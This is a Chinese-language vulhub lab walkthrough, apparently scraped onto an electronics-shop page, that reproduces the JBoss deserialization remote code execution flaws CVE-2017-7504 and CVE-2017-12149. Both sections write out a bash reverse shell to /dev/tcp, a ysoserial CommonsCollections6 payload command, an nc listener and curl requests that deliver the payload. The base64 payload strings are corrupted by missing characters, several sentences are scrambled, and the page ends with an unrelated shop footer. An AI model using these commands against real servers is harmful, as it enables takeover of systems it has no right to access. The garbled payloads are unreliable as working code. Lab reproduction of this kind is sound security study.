资讯详情

(五)vulhub专栏:Jboss远程代码执行漏洞复现

Jboss远程代码执行漏洞(CVE-2017-7504)

影响范围

JBoss AS 4.x及之前版本

漏洞成因

JBoss AS 4.x在之前的版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件中存在反序列化漏洞,远程攻击者可以使用特殊的序列化数据执行任何代码。

漏洞利用

环境准备

名称 IP
攻击机 192.168.75.162
靶机 192.168.75.146

首先输入以下命令进入以下命令vulhub在攻击机,然后访问攻击机http://192.168.75.146:8080即可

cd vulhub-master/jboss/CVE-2017-7504 docker-compose up -d 

image-20220713161234174

漏洞复现

首先准备好生成payload的工具:

然后准备反弹shell命令需要执行base64加密

//反弹shell命令,注意自己替换 bash -i >& /dev/tcp/192.168.75.162/6666 0>&1 //base64加密 YmFzaCAtaSA JiAvZGV2L3RjcC8xOTIuMTY4Ljc1LjE2Mi82NjY2IDA JjE= 
java  -jar  ysoserial.jar  CommonsCollections6 "bash -c {echo,YmFzaCAtaSA JiAvZGV2L3RjcC8xOTIuMTY4Ljc1LjE2Mi82NjY2IDA JjE=}|{base64,-d}|{bash,-i}" > poc.ser 

执行上述命令后,将poc.ser接下来,新打开文件cmd窗口执行以下命令:

nc -lvvp 6666 

监控启动后执行下列指令:

curl http://192.168.75.146:8080/jbossmq-httpil/HTTPServerILServlet  --data-binary @poc.ser 

如下图所示,

Jboss远程代码执行漏洞(CVE-2017-12149)

影响范围

漏洞影响5.x和6.x版本的JBOSSAS

漏洞成因

该漏洞为Java反序列化错误类型存在jboss的HttpInvoker组件中的ReadOnlyAccessFilter过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。

漏洞利用

环境准备

名称 IP
攻击机 192.168.75.162
靶机 192.168.75.146

首先输入以下命令进入以下命令vulhub在攻击机,然后访问攻击机http://192.168.75.146:8080即可

cd vulhub-master/jboss/CVE-2017-12149 docker-compose up -d 

漏洞复现

首先,准备生成payload的工具:

然后准备反弹shell命令需要执行base64加密

//反弹shell命令,注意自己替换 bash -i >& /dev/tcp/192.168.75.162/6666 0>&1 //base64加密 YmFzaCAtaSA JiAvZGV2L3RjcC8xOTIuMTY4Ljc1LjE2Mi82NjY2IDA JjE= 
java  -jar  ysoserial.jar  CommonsCollections6 "bash -c {echo,YmFzaCAtaSA JiAvZGV2L3RjcC8xOTIuMTY4Ljc1LjE2Mi82NjY2IDA JjE=}|{base64,-d}|{bash,-i}" > poc.ser 

执行上述命令后,将poc.ser接下来,新打开文件cmd窗口执行以下命令:

nc -lvvp 6666 

监控启动后执行下列指令:

curl http://192.168.75.146:8080/invoker/readonly --data-binary @poc.ser 

如下图所示,

标签: 传感器ljc20a4

锐单商城拥有海量元器件数据手册IC替代型号,打造 电子元器件IC百科大全!

锐单商城 - 一站式电子元器件采购平台